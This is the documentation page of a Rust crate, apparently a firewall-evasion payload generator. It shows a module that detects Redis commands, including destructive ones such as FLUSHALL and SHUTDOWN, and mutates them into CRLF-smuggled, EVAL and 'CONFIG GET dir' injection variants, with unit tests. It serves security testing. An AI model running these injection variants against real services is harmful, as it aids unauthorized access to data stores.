wafrift-grammar 0.2.16

Grammar-aware payload mutation engine — SQL, XSS, CMD, LDAP, SSRF, path traversal, SSTI.
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108

//! Redis command injection grammar-aware mutation.

/// Detect Redis command injection signals.
#[must_use]
pub fn detect_type(payload: &str) -> bool {
    let p = payload.to_ascii_uppercase();
    [
        "EVAL ",
        "SCRIPT ",
        "CONFIG ",
        "FLUSHALL",
        "BGSAVE",
        "SHUTDOWN",
        "GET ",
        "SET ",
        "DEL ",
        "HGET ",
        "HMSET ",
        "LPUSH ",
        "RPUSH ",
        "INFO",
        "CLIENT ",
        "MODULE ",
        "SLAVEOF",
        "REPLICAOF",
    ]
    .iter()
    .any(|sig| p.contains(sig))
}

/// Generate Redis mutation variants.
#[must_use]
pub fn mutate(payload: &str) -> Vec<String> {
    if !detect_type(payload) {
        return Vec::new();
    }
    let mut results = Vec::new();
    let upper = payload.to_ascii_uppercase();

    // CRLF injection / protocol smuggling
    results.push(payload.replace(' ', "\r\n"));
    results.push(format!("*{payload}\r\n"));

    // EVAL-based RCE
    if upper.contains("EVAL") {
        results.push("EVAL \"return 1\" 0".into());
        results.push("EVAL \"return redis.call('INFO')\" 0".into());
    }

    // Command concatenation with newlines
    results.push(format!("{payload}\r\nCONFIG GET dir"));
    results.push(format!("{payload}\r\nINFO"));

    // Inline command variants
    results.push(payload.replace(' ', "\t"));

    // URL-encoded variants
    results.push(payload.replace(' ', "%20"));

    results
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn detects_redis_signals() {
        assert!(detect_type("GET key"));
        assert!(detect_type("EVAL 'return 1' 0"));
        assert!(detect_type("CONFIG GET dir"));
    }

    #[test]
    fn generates_protocol_variants() {
        let mutations = mutate("GET key");
        assert!(mutations.iter().any(|m| m.contains("\r\n")));
    }

    #[test]
    fn rejects_non_redis() {
        assert!(!detect_type("hello world"));
        assert!(mutate("' OR 1=1--").is_empty());
    }

    #[test]
    fn eval_variants_generated() {
        let mutations = mutate("EVAL 'return 1' 0");
        assert!(mutations.iter().any(|m| m.contains("redis.call")));
    }

    #[test]
    fn config_injection_appended() {
        let mutations = mutate("GET key");
        assert!(mutations.iter().any(|m| m.contains("CONFIG GET dir")));
    }

    #[test]
    fn tab_separator_variant() {
        let mutations = mutate("GET key");
        assert!(mutations.iter().any(|m| m.contains('\t')));
    }

    #[test]
    fn empty_payload_returns_empty() {
        assert!(mutate("").is_empty());
    }
}